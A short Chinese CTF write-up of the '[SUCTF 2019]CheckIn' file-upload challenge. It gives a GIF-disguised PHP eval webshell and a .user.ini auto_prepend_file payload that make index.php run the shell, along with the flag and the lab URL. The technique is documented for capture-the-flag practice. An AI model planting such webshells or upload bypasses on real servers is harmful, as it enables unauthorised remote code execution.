0
点赞
收藏
分享

微信扫一扫

[SUCTF 2019]CheckIn

GG_lyf 2022-04-16 阅读 52
phpweb安全安全
加载失败

[SUCTF 2019]CheckIn

不怎么看感觉就是一个文件上传,再加上checkin,感觉不难== 结果

.user.ini+图片马+index.php三者缺一不可,

在这里插入图片描述

图片马内容:

文件名m.jpg
GIF89a?
<script language="php">@eval($_POST["web"]);</script>

.user.ini内容:

GIF89a
auto_prepend_file=m.jpg

flag{55134a88-950d-4115-af3b-6c4dab2f1ee2}

注:最后蚁剑连接时,要index.php路径

http://206d33b7-0d2b-4d15-85e3-245d4b62557d.node4.buuoj.cn:81/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php

举报

相关推荐

[SUCTF 2019]Game

字符串3dhtml虚拟化云计算

[SUCTF 2019]Pythonginx

nginx运维web安全后端网络安全

BUUCTF:[SUCTF 2019]Pythonginx

SUCTF2019BUUCTFnginxNginx配置文件代码人生

SUCTF2019 misc 签到题

html数据压缩包Java编程语言

[SUCTF 2019]EasyWeb---无参数RCE

phpweb安全安全

buuctf-[SUCTF 2019]EasySQL 1解题记录

golang算法

[SUCTF 2018]GetShell

windows电脑

2022 DASCTF X SU pwn checkin

网络安全

BUUCTF:[SUCTF 2018]GetShell

BUUCTFGetShellSUCTF 2018phphtmlHtml/CSS前端开发

[SUCTF2022]wp

网络安全phpjava
0 条评论
加载失败